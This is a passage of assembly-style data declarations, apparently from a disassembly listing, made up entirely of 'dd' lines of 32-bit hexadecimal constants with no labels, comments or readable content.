		dd 0ACF25047h, 0C45EA7ADh, 8DA27724h, 0FB47A54Ah, 1E0EE363h
		dd 0E144AB38h, 0D2F5F565h, 411363E3h, 283AFF67h, 357B85ABh
		dd 8E99903Eh, 0CED616BDh, 1A05BB09h, 97E404CCh,	0F33F8EC8h
		dd 5EFC95F7h, 3D2D8061h, 0AD68E4DFh, 0A3BA073Ah, 7CDC645h
		dd 0D623FAF6h, 4C3B9A96h, 0BE262DE8h, 6B43929Fh, 51010D5Eh
		dd 36AC0735h, 3026A81Dh, 6E5C46E9h, 0D1532FD1h,	0ED7A8257h
		dd 0C2A290C5h, 0B3565DE5h, 0EFFD1F4Fh, 2FDA0206h, 0CFF4C5BEh
		dd 4955DF6Ah, 38D9BCBBh, 403D06BEh, 8A493C39h, 8B0DAAE8h
		dd 0A980668Ah, 2AF70FD7h, 0FAB56829h, 0D7291A62h, 0F513D5D3h
		dd 0BCA6EADDh, 0B7EE4E72h, 9B459C07h, 80A6BEE3h, 0A8B6CB5Ch
		dd 0B83C93F4h, 44D1226Dh, 0A1EA8A0h, 36DEAE8Bh,	36250C4Dh
		dd 0C0FE5FEDh, 14DD6AABh, 9502AD4Ah, 80F3D65Dh,	82074A12h
		dd 0DFD9B487h, 2A73FBC7h, 468F3C5Fh, 0E483150Bh, 0BE7FCB16h
		dd 0D5B80F4Eh, 2884E0E3h
		dd 531BA067h, 3DAB5D25h, 63334555h, 534DBDE9h, 0BE0F4BEFh
		dd 43EA538h, 0A3793A16h, 0F6AB4EDDh, 0EFB5F3B3h, 0FF90F239h
		dd 0B685E7EBh, 4F2BD89Bh, 61C14C2Bh, 0D762F9E2h, 0EE1A030Dh
		dd 6B0FDD5h, 3C26F5D4h,	0E43EF849h, 84ADBB6Eh, 8670702Fh
		dd 0E143FD0Ah, 0F085F4Eh, 95E826FBh, 9871535Ch,	0F43A8E2Dh
		dd 0BD2EF538h, 97469DA3h, 0F1D99259h, 4A2342A1h, 0FC54CE54h
		dd 3A65986Bh, 92EC1879h, 2496254Ah, 0B9993645h,	0DEA883E4h
		dd 4C47E39Eh, 0AFF65E28h, 791FAFE1h, 93428760h,	99532CA4h
		dd 0F8BF2311h, 0CA7FC5C9h, 0D3C3704Bh, 72E67E5Bh, 232AC633h
		dd 4A12A75h, 0BA012F98h, 0A1C5E594h, 52F62B4h, 0E3BC4CFh
		dd 80F5B23Ch, 2DAB823h,	0DDE0AF04h, 3CDA3110h, 93B05EEBh
		dd 1B73BE3Eh, 78508BAh,	68EF93B6h, 0F0E52988h, 21F8F9D5h
		dd 0DC68AA27h, 889CCC4Fh, 5C0BE68Dh, 0F1165CBDh, 0DB9C7E93h
		dd 2158A242h, 2150BBCCh, 45A87E0Fh, 586694C3h, 5C01312Ch
		dd 0F3165594h, 255AA647h, 14A38FE5h, 26D126h, 183B994Eh
		dd 0D08CD072h, 17C5EFC1h, 5003B8C8h, 19863A11h,	3ED48F64h
		dd 0E1229063h, 0C4BCE80Bh, 5DDA29E0h, 4AC578B0h, 542BEFC6h
		dd 81FCF51h, 0EA78FC02h, 0E92D3647h, 8F4FCCFCh,	5CAE136Eh
		dd 9825A8E0h, 35F062E6h, 710E79F8h, 0B825869Ch,	0F5819F5Ah
		dd 6782F78Bh, 0E6BD46D4h, 16BA49F0h, 96B3FE77h,	0BFCD9CE7h
		dd 0F10DD9D4h, 0B03D2235h, 2CD4FD4Ch, 0B6BC9F35h, 0B55323FDh
		dd 7E4FE5BBh, 0A1EBD5Fh, 765179AEh, 0A1B53D62h,	8A607455h
		dd 0FAFE90E0h, 0E0924A56h, 416E2A2Ah, 51010925h, 0A9418B09h
		dd 6A5EAC7Ch, 0E6416876h, 2C5AFC2Ah, 0E607E289h, 0A845DA28h
		dd 0BFBFA13Fh, 0B8C7F431h, 0B51C078Ah, 3C6D57A9h, 0C2915F28h
		dd 0C175111Fh, 0A44C8B2h, 78424221h, 2768FEFDh,	0F1BC3535h
		dd 0C5E3E9D1h, 0B833D50Dh, 38110BE7h, 0B878EE84h, 76204DB3h
		dd 47BE20E1h, 0CADA381Fh, 0DB1F596Eh, 0D1E0357Ch, 492276B1h
		dd 20EA28B6h, 98BA38FBh, 5B34DE2Eh, 0F0B2A8E1h,	50B4206Bh
		dd 79C93329h, 174A4BE5h, 19AA9B8Eh, 35B6B4B1h, 0DA3AB3Fh
		dd 0B51C2E12h, 0CF6F5DECh, 0A4FBF705h, 1490663Eh, 6F24408Bh
		dd 54BF62E1h, 0C701CB0Ah, 0E06BAC4h, 7E4D5BFDh,	0C5960615h
		dd 7645AA3Ah, 0F0FAC9DEh, 350E152Fh, 0A3E64AFh,	0CD250F02h
		dd 0B651153Ch, 4E407474h, 0B778832Dh, 0E17496F2h, 2EEA982Eh
		dd 0F912B44Dh, 77C88698h, 122F3A89h, 0ECDD4E0Ch, 9E4D40E7h
		dd 0CD34A405h, 0A5F77531h, 0F90F0C9Ah, 4F5E025Eh, 1E0CBB3Ah
		dd 0E80C3826h, 34D50930h, 0DEFB3F1Bh, 457B2878h, 425AC2B8h
		dd 7C9B5417h, 0F280DB1Bh, 83241C65h, 0AA0A3A93h, 0C9BA713Dh
		dd 0FA7DB535h, 8A9004F7h, 0BEF9A339h, 0A9F47680h, 0F45243ADh
		dd 0DB99C68Eh, 0F645EE78h, 7A1522EBh, 461B2E99h, 0C2A42327h
		dd 413BA4Dh, 46D8AED9h,	5A2AFB04h, 75314ACh, 0DD6B3B57h
		dd 8B18135Fh, 7161E191h, 39BA84D1h, 35149379h, 0C0B9AE6Bh
		dd 0ABB6360Fh, 0FE888A5Bh, 0A8B68F54h, 0DC1A75F1h, 0C66197D3h
		dd 30AB4493h, 16951C60h, 2FBF7EBAh, 0FDC6F37Dh,	13E3CC07h
		dd 28027A29h, 0DF57A8BEh, 86DA9BC8h, 0E2B483CDh, 916E30D8h
		dd 3B1440FDh, 9168AAC7h, 28B0B84Ch, 0F5E2D2A1h,	38B9FA48h
		dd 55E27EC2h, 315B9BC4h, 0A930A768h, 0CDE5E0F6h, 808C38EFh
		dd 0A3AB0BD7h, 3ACF9F4h, 0F8AD6DC3h, 5F216B68h,	8ACA7E14h
		dd 0D92888D5h, 0BF73F827h, 4BEC95A3h, 3F255650h, 43E3459h
		dd 377F7B9Ch, 0E303D4BDh, 64821FD1h, 9E8ED67Dh,	13B6161Ah
		dd 0AD5A1360h, 6A829D0Dh, 0E7BD9CDBh, 667C292Ch, 0EC971567h
		dd 0B64475F0h, 9518CD39h, 7A1BE94h, 7F15CDA7h, 5670AF43h
		dd 6441ABDEh, 0ABEECC44h, 5C662281h, 14BFBF28h,	381E28D0h
		dd 0BD22BF23h, 34363786h, 689AFBBAh, 344583A7h,	6BD7F8F3h
		dd 969DE763h, 8C58C672h, 0B71D3AB7h, 0FDC61858h, 328EDC52h
		dd 0AE45941Ah, 22C425D6h, 101C12F7h, 0B646D0BDh, 82BAA793h
		dd 0FCBDD178h, 0F5378BC9h, 83C543F0h, 0D7C4C213h, 0ABCE5BB2h
		dd 485DE60h, 64497D8Fh,	1485EC83h, 4B4B67A0h, 0C93D0374h
		dd 0F37E8859h, 0D1661503h, 0ABDB3546h, 787833E9h, 7C312276h
		dd 5097B070h, 0B8D31519h, 6F94EA0Dh, 121C580Ah,	0B7814225h
		dd 26509CE2h, 7F9DF1CBh, 0FDC139A9h, 0EBE5123Dh, 0DF4297FDh
		dd 1F06F7D6h, 0C456B2A8h, 8560B2D9h, 0F795A568h, 6266E2CBh
		dd 7AFD82F1h, 9150103Eh, 296B6812h, 1DB5A246h, 0F39605B5h
		dd 103C1313h, 0F63D666Dh, 0D55F278Bh, 2FCA1EA9h, 6EBE5B79h
		dd 6AF980C2h, 0BF86B553h, 63DA64ABh, 53B5D91Dh,	9F46ED1Fh
		dd 4C23E13h, 17D26ECDh,	0A92BC057h, 0A6D1188h, 295F47B6h
		dd 6D7C1491h, 1AE7D684h, 0E0BC91BCh, 0E7749F87h, 7743F0E5h
		dd 0F257D94Ch, 342AB918h, 4302B134h, 0E8F60D2Ah, 6C2A3A0h
		dd 69532D5Fh, 5DB082A6h, 5F134EC7h, 818680E0h, 0F8FFBFFBh
		dd 0A6CB077Bh, 0A8340E65h, 445177A1h, 0E0DD54F6h, 24B9281Ch
		dd 0B1C88421h, 0CF4AA312h, 0A3690057h, 50764B21h, 41CAA211h
		dd 43B1DB61h, 6E4A6FC3h, 41AA1654h, 0BD487FDDh,	0F627796Dh
		dd 0FCB890BCh, 1741D252h, 0F47h, 0C21FBBEh, 2F51F448h
		dd 4C2CF8CFh, 7BAADE3Dh, 0DCECB6A4h, 0FA79A9C6h, 0CBDAC3B2h
		dd 0E237297Bh, 53BC9C95h, 0D8F2054h, 0F8315B45h, 0F47D2146h
		dd 2CC21FC1h, 0BDE02C5h, 0A33C81B5h, 0C9B5060Dh, 0B7A9D1C9h
		dd 0E3E825BDh, 7E3BF877h, 0EDDB9FD2h, 0D9774408h, 1E1E5EB8h
		dd 6091ABD8h, 2BE39687h, 0E5AB421h, 4B146F76h, 0E6C55A5h
		dd 127C9E15h, 0B816C594h, 8BB458FAh, 0A40AE17Dh, 2BB47B54h
		dd 5F853B9Bh, 59496780h, 6225EDF1h, 0A018A918h,	0F4EB9D1Ch
		dd 31286A2Fh, 0AD680351h, 657B665Ah, 0F770906Eh, 89B77160h
		dd 0FC503ADFh, 51CEDF8Ch, 3B99C4A1h, 7E380F2Eh,	69DE87E3h
		dd 0D95636FDh, 433D5247h, 80D724AEh, 0C30B3ABh,	84076F24h
		dd 0BE6B5C9Ah, 49ABBF5Eh, 89F337C5h, 0A3DE5B7Fh, 0FB09ED05h
		dd 0F9F198EEh, 25AEE48Ch, 0C5E50B63h, 445CB30Fh, 0AE11F5CAh
		dd 40F42F0Fh, 5CDD277Bh, 72C4BE3Dh, 0F44D0AA9h,	814CAF8Ah
		dd 0D1861994h, 0CF137B3Eh, 9CDC176Dh, 73966FDFh, 0C063CFD5h
		dd 0C3F04AFAh, 78C97583h, 0FF31D1FAh, 0BD6C12C0h, 79CA7FE2h
		dd 0BD21AF1Fh, 76F00358h, 8E81D1BEh, 0E5F34FF4h, 217F81E3h
		dd 0B57C7BAFh, 0FFA0BC7Fh, 0A64AA540h, 0F46871ABh, 3AC87DEEh
		dd 0AC110E36h, 2DB3510Ch, 2BB47E83h, 0D229F431h, 8CF67D43h
		dd 0FD96063Fh, 4EE06A14h, 8A108131h, 4ED6F8A2h,	32BD154Bh
		dd 0A5DFCC2Eh, 0D25B32D8h, 2B4B58B4h, 0AE2F7300h, 594BF208h
		dd 5639E28h, 2B4D6C3Fh,	37D376BFh, 7B835C74h, 0E07EDBFDh
		dd 0BEDEC681h, 0E980D50Bh, 0DB05B0A1h, 2A455F3Ah, 0E1824656h
		dd 0DDDFE92Ch, 12382120h, 992C55ABh, 0B03C2ABDh, 0D291C247h
		dd 9289AFh, 0FE5D7A55h,	538A45E3h, 0F71B033Ah, 0A09D72E4h
		dd 6D17CCCAh, 77865752h, 0AF92E83Bh, 9A3F46EFh,	4528A907h
		dd 0EE026721h, 0A204A024h, 8D88EF82h, 53C7FDFh,	0C6F0163Eh
		dd 0F12CAF12h, 59213E83h, 2C43FDF8h, 1ACED898h,	48296945h
		dd 2F0641A0h, 0DBD6E9B5h, 3E25A8Eh, 0E9D89567h,	0A20DDD1h
		dd 2F968E0Fh, 576729AAh, 0EC948272h, 33C2491h, 697C5916h
		dd 67BFF6BCh, 0A6A83288h
		dd 2A9E4188h, 0C899825Dh, 0AC59A9A2h, 0F89AB68Ch, 0A3CA5421h
		dd 7BAA8E85h, 7C999DA3h, 6D753669h, 3D0B1D13h, 84F01712h
		dd 0C5FCF89h, 2992ABDBh, 89A556AEh, 2CB485D9h, 7E7FB380h
		dd 8914EF41h, 0FBA160Fh, 0E41FB90Eh, 4BFC08FDh,	7317B2F3h
		dd 3F838D4Dh, 0DF12C4A4h, 2FC39CBBh, 6A42D5BCh,	21DFA72Ch
		dd 5B0B5E6Bh, 0B7CBEA2Fh, 95284CC9h, 7DD65BDDh,	0A5D66527h
		dd 0AB19CCECh, 17E68845h, 9468F6ACh, 0E10FF214h, 1EA1E976h
		dd 4CDE781Eh, 564477A5h, 5292D971h, 0E3D3A8DEh,	6B645AE2h
		dd 6B6A7867h, 46ED5C85h, 1CE8DF2Ch, 539CC8DAh, 0E05B7890h
		dd 2D2F8F5Ch, 4272D2FCh, 1997B2EFh, 0EBF0A5A3h,	0E059E1E4h
		dd 6BCD7D07h, 8A51174Dh, 1A7035Fh, 0B464DB11h, 0BEFBD56Ah
		dd 0F4F33F18h, 0A14F0F1h, 0CCBB72BEh, 0E6BF9C78h, 81864286h
		dd 21E397E0h, 0BEFCAB7Fh, 0AF408B05h, 0E87831FFh, 18CF5CDEh
		dd 2E9ABEF0h, 0EB39EB8Dh, 4F6E2795h, 217C5537h,	0A62D3022h
		dd 0FDF8F81Bh, 0DF4E93CEh, 0A6BCBC8Ah, 4F82D605h, 0BB5550Ch
		dd 0E7DEA618h, 431CC5AEh, 3368678Ah, 7674683Ch,	0DE896C46h
		dd 0ABDEAC1h, 99E62D2Dh, 0D8CB03F8h, 0DE70CCE3h, 22CF0828h
		dd 0A4B8CB2Dh, 0A36A27F3h, 1D86E29Ah, 32E681Eh,	0E8C5864Bh
		dd 0FE647B4Fh, 72ED7ACBh, 2F22717Bh, 0DC56377Eh, 0A13439CEh
		dd 0C6C1B0D3h, 0D6D83B54h, 912F1F4Bh, 97326E1Bh, 52697555h
		dd 0D6A4D124h, 0FD0BAD9Ah, 8A454A4Bh, 7B9D7075h, 847987E1h
		dd 571D7A9Bh, 15EA48E3h, 0E080AAE4h, 0A39B66FEh, 0AFF98FFDh
		dd 0EA3FA312h, 0A1C5AD1Ch, 56B013F4h, 0F4428BE1h, 2FE03C8Dh
		dd 0B2F5A51Fh, 157AE961h, 0E4E7895Ch, 0A9194A3h, 0AAEE9F28h
		dd 8F6CED50h, 68A4247Ch, 978566AFh, 35D85979h, 1656F1D8h
		dd 4BFFEDF7h, 723225BAh, 3B2FE44Dh, 42D14DD0h, 75260DA5h
		dd 21E84998h, 0D0226BC2h, 1765FDDh, 5320CBCDh, 12C30FEBh
		dd 0B5369E23h, 90D3EC9h, 441ADAA2h, 37009B3Eh, 0EF9B6FB2h
		dd 0C4D5AE75h, 1DA7EFF1h, 46A27D10h, 0BDE83BE4h, 0F2F01AB9h
		dd 1E3654D3h, 0D0C3B391h, 41832E54h, 4252E9DEh,	0B3C362C5h
		dd 0E5C065B1h, 0B81E98FCh, 73424133h, 0EF770C26h, 0DEDA697h
		dd 0A579641Bh, 0D8E4A3DAh, 60DC56DAh, 7C19D970h, 0C6497824h
		dd 71066AB3h, 798B1195h, 8B67B46Dh, 78EE3836h, 3F55B8AEh
		dd 9243DDACh, 6E455016h, 4EE6C1D3h, 3337DE87h, 7E6DB4EEh
		dd 869C3218h, 50FC5F77h, 0C3E8E17Ch, 1E0919BAh,	15562AD2h
		dd 0B1D6E8E6h, 9DF470A5h, 1593862Fh, 31CC3EFDh,	0F305EC25h
		dd 43F0D8FAh, 0A3A898F3h, 81673498h, 87E2C184h,	0E0F89FBBh
		dd 61D9A3D5h, 0BC6BC0FFh, 417C7DCDh, 0D13F7E9Eh, 0D064B077h
		dd 12EDA1Ch, 0A008DD1Dh, 54C3F7DDh, 0A7C8F1B0h,	5ED0CEB0h
		dd 6BE6DB24h, 412BBCE3h, 0CCB4D2CBh, 1F27699h, 549399E8h
		dd 0AF07FA2h, 88356AE8h, 0D1C0F4D6h, 0F4FC9311h, 1075F2B0h
		dd 38455DD0h, 0CE6375A5h, 0CEEC7956h, 9989DAACh, 4AD5E028h
		dd 3091C2FCh, 0A3BF59B8h, 5C4A7B92h, 8A0862DBh,	224AC2Eh
		dd 0EB42134Fh, 0AFEAC23Eh, 4B74E7FAh, 0C0320658h, 3DDE9259h
		dd 3481C3F1h, 0A73522A9h, 0A52093D4h, 14B38122h, 0C59E5F0Dh
		dd 0F4903785h, 0ECF0F06Dh, 7CB65DA9h, 0ED83DF8h, 67B3776Ah
		dd 5F3AE579h, 866A0BDCh, 0E669D176h, 0F46B02Ah,	0ED2DBC3Ch
		dd 0DA4CAF26h, 0F0600D50h, 0EA76FC11h, 5E59C9C1h, 22EC8894h
		dd 58F4FD70h, 0FBF9B709h, 0E1B173AFh, 85D4042Eh, 519DC901h
		dd 0B5B6C422h, 0EC5E6AEAh, 2DDC4BF7h, 39CCEF29h, 0B805DC1Eh
		dd 291F0757h, 547198DCh, 0E656C03Ch, 2AF67C87h,	6E179F64h
		dd 0E07989D7h, 0DE58FAAFh, 3CCEF6EDh, 0AD2B917Eh, 0BC2EFFC5h
		dd 3EAA1154h, 19246972h, 224ED316h, 0E9E6FF77h,	0F373C2Eh
		dd 978FA689h, 0BA871618h, 0D7B394FBh, 73DF1F45h, 0FD4A40E4h
		dd 84D64E03h, 0F0BDB51Dh, 783E347Dh, 0B5DDF9E9h, 6037B852h
		dd 0EB9A50B4h, 0DF089732h, 0F077E482h, 3FD89B17h, 0BA1C6D73h
		dd 244B7AF5h, 0BF7F1E74h, 5C0D3A79h, 71CC212Fh,	0B6DD48C3h
		dd 9E3D5191h, 0AC84FE0Fh, 0DC891BEEh, 2DD743F1h, 83BF82C4h
		dd 691C5FB8h, 0D94616BBh, 8D6BA96Ch, 2C5A9358h,	8717B627h
		dd 0BF6A6D81h, 3CDD17Dh, 6C7FBD37h, 0F818DC6Bh,	0C3DE3C4Ch
		dd 8E9D6D55h, 0F39EAB4Eh, 0EB748289h, 3BFE42BDh, 0FF7B9044h
		dd 127FC1A6h, 3B3FB918h, 1B693D09h, 94CC0781h, 7C53C3DFh
		dd 9F6EE5A0h, 45132735h, 0DA7CC99Bh, 5F4568E1h,	976AAD4Ah
		dd 0AD423F2Ah, 2CC649B7h, 0E8D7DB70h, 0C37AE22Bh, 82854989h
		dd 568F1B0Bh, 4FF9EF59h, 33E393B4h, 0B7DADD1Ah,	0FEDF89BAh
		dd 7B70FF45h, 2AC05834h, 0D881333Bh, 0EC71803Ah, 208E4018h
		dd 1803CA7Bh, 0DFDA772h, 8F794FE0h, 0A34F0447h,	6288B44Ch
		dd 0A47C8B69h, 5534BE1Ch, 27D60572h, 66070958h,	38218B6Eh
		dd 752A425Ch, 3280981Eh, 5CBB8D77h, 1F997EC0h, 6978ADF8h
		dd 0C1F73947h, 674A46E0h, 0B2F855CFh, 4C6760Ah,	1B37D3E9h
		dd 0A805B6EAh, 796103C8h, 0BDB2C0Ch, 33687319h,	0B21E0DCDh
		dd 1F22A0E1h, 469EB55Eh, 0E5C3F81Fh, 4A106DBBh,	0F178F13Ch
		dd 0DE0E59EFh, 233412FCh, 0EDFABBD4h, 6E66EECAh, 739B9B8Eh
		dd 2FB68593h, 0A1383E0Fh, 0AEDADFB0h, 7F7A7605h, 602297FCh
		dd 0A739930Ah, 6D2AE9ACh, 0C5877EA8h, 4B254A5Fh, 5A39DFF9h
		dd 81D339F6h, 6CA5ED7h,	71A5ADF9h, 0B3C5E4C2h, 55062FC3h
		dd 6D5F38A4h, 62CE1B3Bh, 2731AAAFh, 88D40735h, 0CF09AAA5h
		dd 0BDA965D4h, 0F165E12Ah, 0F6C2707Ch, 0F0016BCFh, 0AA8B03D2h
		dd 0F6A3A9DBh, 25354462h, 0CDFF2B56h, 0EAEFB53Ah, 0A3680D54h
		dd 0D8CAE5E6h, 81CF3370h, 55290416h, 5DB26E34h,	4C752F7Fh
		dd 548E1BF3h, 437F228Fh, 7217C3C3h, 0A49E0B8Bh,	8CAFCB18h
		dd 6223635Ch, 5AED96E6h, 8CB87908h, 7BFDD21Fh, 1CC14885h
		dd 0E08B14B4h, 916F4646h, 975BF9EAh, 7C997E2Fh,	481EC0F0h
		dd 5E0FCB33h, 0A561A87h, 0AF586E03h, 5A9FA680h,	0C2FDBB9h
		dd 8707276Fh, 0C0FE7DE9h, 0E33D850Eh, 8BD0B1F4h, 0FAD11065h
		dd 271B10EAh, 0B0AB164Ah, 66A89A45h, 7E34FD27h,	757015E5h
		dd 0E6B0500Fh, 7CF3AB45h, 7909A6E3h, 0E0FEEDA0h, 0FFC11157h
		dd 606C501Eh, 3D4B6116h, 2F756DA3h, 7937A39h, 46741ACEh
		dd 380F0ADFh, 7AFC25FEh, 0C8D4CCA6h, 0C73A8A62h, 82CE05C7h
		dd 0CB46AE9Ah, 14F21F1Fh, 9ECC5652h, 995AF882h,	541AE7Eh
		dd 0A7E02AACh, 87E27ABh, 541814DEh, 4ED12A93h, 0FA9E8C4Ch
		dd 966C64E3h, 876A2EA0h, 81F509ADh, 0B8920D6Ah,	0A27EBF8h
		dd 8AD5B66Ch, 0B9536FBBh, 6B1BAE5h, 0B71669ADh,	217C6A56h
		dd 48DEC4A7h, 6EFF54CAh, 5695FD46h, 0B79F2C00h,	0FCC9F829h
		dd 0F0FCB81Bh, 3CEB73F6h, 8E293D2Ah, 3ACB2EB2h,	5D02ABE5h
		dd 0BD8F48ABh, 0D19A7C10h, 0AD1F560Fh, 44B1C547h, 60A2674Ch
		dd 9FDF5C4Dh, 4D64CD5Eh, 0B7DDBE95h, 0C5DBE391h, 41B5E876h
		dd 90469109h, 0D5FC385Fh, 0D3C5E130h, 80C70F6Eh, 148BDCD9h
		dd 4976BD37h, 7787BEBDh, 7A1DDE12h, 40754BF6h, 37BD1F4h
		dd 0AD11B74Dh, 0B2591F2Ah, 7DA91350h, 0D6DCE8D8h, 0F78C616Dh
		dd 3A9217Eh, 2E9BF12Ch,	6CE460A1h, 4CEBF80Dh, 1505F0FCh
		dd 0F5EB3824h, 1E325BD8h, 41E0FABCh, 86C4ECDDh,	1D188BA9h
		dd 3F89A85Dh, 645A52EAh
		dd 5836605Dh, 0B6D82394h, 0AC49AA9h, 7FA06FD8h,	0BF1A2C48h
		dd 0FB2ED9FFh, 861A1FF0h, 3BE9D175h, 0DDFAE215h, 820FBB68h
		dd 6D88FCCFh, 0CBE537D2h, 0C8237E2Ah, 5263E22Eh, 0BA500481h
		dd 736698F4h, 4CCE8C9Bh, 0E8E08402h, 0DE164D1Bh, 5CED7E71h
		dd 12CBD358h, 0E30EFF01h, 7AF7078Eh, 0EFF473D5h, 3187D4F5h
		dd 1DA468EEh, 0BB47BB3h, 0EB81DAEEh, 5F574D06h,	5C48ACD3h
		dd 0BD213899h, 758E03D4h, 57C3BB4Eh, 688E2B60h,	0FA9532A5h
		dd 3FE1F60Ch, 0E0F06222h, 5C52FD9Bh, 39DA30Fh, 0E5A0887Eh
		dd 0F40F2459h, 0B445D50Ah, 8DFAA353h, 67E7E678h, 682AF980h
		dd 8FDDD44Ch, 6412F66Ch, 25CE762Dh, 53B4A2F6h, 0BEB61BCEh
		dd 6F12785Bh, 414265D1h, 6A41697Eh, 939853E1h, 0BF14683h
		dd 207EF97Dh, 0E85589C4h, 0A82FC2BEh, 0D50EEBFBh, 7C67F69Dh
		dd 0CE4957A4h, 4B85932h, 68805563h, 0E16B5612h,	0A2D7DDA3h
		dd 0D42A59F9h, 0DB0FC050h, 0DFFC3EA4h, 8B5C454Eh, 0F0952B41h
		dd 9649FDC3h, 857BAB3h,	8B0861DEh, 0CC6C7BDh, 6FD48CE4h
		dd 346740Ch, 143FD99Fh,	0F304AA8Bh, 0EF110756h,	130B8169h
		dd 2AC15519h, 0E386A28Eh, 1E0249F6h, 8607CF67h,	27C8B318h
		dd 0E3F1EF97h, 0BA4A8A97h, 0B74E6EB2h, 0F2BCBE2Fh, 0ED4B58Bh
		dd 1B0A777Ah, 51B43A92h, 70E8A429h, 912058ACh, 97B21BA6h
		dd 84E7D0E5h, 3FDDAADDh, 0FC6827A1h, 4E206ECBh,	0B76872C8h
		dd 9F785069h, 0E3817E38h, 0A5A40806h, 0C6079B50h, 697F6AAh
		dd 0E50894DDh, 3F45325Fh, 0DBA7CFC9h, 0AFC3F859h, 91D9821Ch
		dd 38D7C1A3h, 0B4664F77h, 1DFAC9E7h, 0E0D3B5Ah,	711BA0E1h
		dd 7D6B4EDEh, 0F8B1054h, 0FAD852FCh, 0DA95559Fh, 0B541B16Ah
		dd 46F882AEh, 0E2FFD66Eh, 7A8B7606h, 76FAAD82h,	170DF072h
		dd 42C5CF44h, 4B4C769Bh, 0C12BFF3Fh, 15C6268Eh,	0E88182F8h
		dd 18DBA383h, 7FBC60A4h, 511C8063h, 0BBE819FCh,	3D95D54h
		dd 54D7D916h, 0E63E144Dh, 0AC99C55Eh, 0EC4C528Fh, 932CC926h
		dd 44A828A8h, 0CB90FBB9h, 0E5E01531h, 0EFA536D0h, 60782B1Dh
		dd 9FABFD8Eh, 840810FDh, 52C46EAEh, 5F27B029h, 764D077Ch
		dd 0D523C324h, 5BB58570h, 70D1FE45h, 0B6512E0Bh, 0C18B5071h
		dd 85A680A7h, 92D7056Dh, 38DE1F8Dh, 8E045687h, 1B321F65h
		dd 9C6B2EB7h, 0A6E91FDFh, 18CB7183h, 32BC34EDh,	6CE93D12h
		dd 17936B88h, 0BFACB54Ah, 75322CDFh, 0E8BCAECEh, 4D3ECB12h
		dd 69D89908h, 18D322B2h, 0FABAEA28h, 56F92559h,	0F35A5A40h
		dd 0B538C34Bh, 0BED0C0F7h, 45D2CFBEh, 4ABCA421h, 4DE044DCh
		dd 16F8F321h, 0BA366DF7h, 0D84D857Bh, 7F30377Dh, 5B5F5F20h
		dd 0B4556DCFh, 18996684h, 8967893Dh, 96362EAAh,	173C0A6Eh
		dd 0E62AC18Ch, 0BC5FAFC4h, 8E5FEB2h, 9BDC0273h,	39DD5B76h
		dd 72D1C5F5h, 0EE9EEABEh, 7B10E689h, 716111A1h,	0FC885DA5h
		dd 98B8F898h, 77A2222Ch, 80692CC1h, 0D284EE04h,	13274ED4h
		dd 4BD5EA03h, 0E139988Bh, 0AB6864FBh, 4ED3CE53h, 92014555h
		dd 0BD6F1F10h, 0AF682451h, 3CD064A2h, 0B369D571h, 0DF90C7C7h
		dd 0B0F82BADh, 45AAB9D6h, 1A94D553h, 0CBED128Eh, 99EFC8AEh
		dd 0E4165D19h, 0E6081DF4h, 89C593B5h, 0AD3CAAD6h, 4C482ED2h
		dd 5BF8972Ch, 0E1AA6D30h, 91E716E4h, 92858722h,	2AB79A1Dh
		dd 45FE88B9h, 79AE5607h, 0BFDB2BB2h, 3B55593Ch,	0B1D16194h
		dd 77371E24h, 318A899Eh, 0EE10E5FFh, 0EF078C93h, 0CD4BB96Eh
		dd 0FF78CEE6h, 86F3A144h, 65C85750h, 79E54863h,	7D16F528h
		dd 0D9B4278Eh, 0F9D179ACh, 0E5209177h, 97E0E80Ah, 0D48BA6C9h
		dd 90229CAh, 0E10B643Fh, 3CD8C82Ah, 0E8FA7EB8h,	0B83ED88Ah
		dd 746EE376h, 0F18B607Dh, 6CDFDCA3h, 11527534h,	0E8C7713h
		dd 0F2AAD423h, 0A2F7430Bh, 0FF2D1E6Eh, 0D278E131h, 4FEB4329h
		dd 0C2F58336h, 0E96008D8h, 10DC2D2Eh, 2E5D791Ch, 3DCA85A8h
		dd 0EEF56675h, 0BB5485E5h, 0F07D899Ah, 208AA034h, 6D89B065h
		dd 39E1CD60h, 20CB299Eh, 13B975F3h, 0FDF4D676h,	685ACAA3h
		dd 7DACFC34h, 2ADFA810h, 109E1A24h, 42C1BA74h, 655D240h
		dd 0B963502Ah, 0EA1D912Dh, 97DD2554h, 4EBD6B6Bh, 3E745626h
		dd 6BB28959h, 3E36CE2Dh, 0E4E3F37Bh, 181F8D33h,	0DD096725h
		dd 0BEB60E0Eh, 35B2EDEFh, 2FD83E79h, 0FEC3AC9Eh, 79BD1B96h
		dd 227EF6C1h, 0AACDD111h, 794B7C0Fh, 41E66CB1h,	3584FE8Ah
		dd 34BC5171h, 3E17844h,	8DF9FE87h, 7DB70F2Eh, 5D3D2DFh
		dd 0B19D176Fh, 5055E007h, 0FEE668BFh, 1DD66C8h,	0A7EA17FEh
		dd 55CF7EC3h, 27D35C2h,	50B06311h, 4114260Ch, 27D2165Fh
		dd 89A5AC6Eh, 0D3523824h, 87E39956h, 0D5A03D43h, 43B8F771h
		dd 88A78C4Fh, 3E08BAC8h, 57D7CB67h, 0B4549FE9h,	0C609EFD6h
		dd 0A8E0386Eh, 323D7452h, 1B05E63Bh, 64188543h,	0E35E039h
		dd 5C572422h, 52DD594Ch, 6A95797Eh, 0D9D9B35Bh,	6A13A267h
		dd 0D3C9C31Fh, 0A9E45150h, 0AE2782Ah, 0F6099AFFh, 0C40E8587h
		dd 941AFFEFh, 420E1EAEh, 0BDC20757h, 0BF06BE5h,	0E4D0EAABh
		dd 769B3DFEh, 29689D40h, 0FAF1BF90h, 50C59E63h,	8A9EF7F1h
		dd 410FF1B4h, 0D407172Fh, 7A7A3BF8h, 0ABEAE4CEh, 0DBEF147Ah
		dd 0DAED7D89h, 62073CD9h, 8B1F2977h, 8B743CDFh,	0B6896627h
		dd 1F8230B8h, 0DB301F0Ah, 1762BF68h, 4F6781FCh,	578D03DCh
		dd 0EFF9CF32h, 0D7F86CD6h, 904645FEh, 735A2C98h, 892CC517h
		dd 8703AA8Eh, 0ACE35D13h, 0D17EE281h, 0B755B095h, 0F674FEB4h
		dd 7A648689h, 89AEA611h, 0F2EA5072h, 446653h, 0FEF9FC26h
		dd 0E1FB42D1h, 9BCC50BAh, 5305F1B7h, 0AE764F62h, 285C5A90h
		dd 0D194E4FCh, 0AE4217D8h, 0C3628CBAh, 8412A7A3h, 9CFFFA56h
		dd 0A42E69E2h, 0B84A8294h, 0CE021F83h, 0BF8A1A24h, 3DDE4766h
		dd 0E3A6CBBEh, 32D3B87Dh, 0B2112D98h, 5D2BC7C6h, 0C699F771h
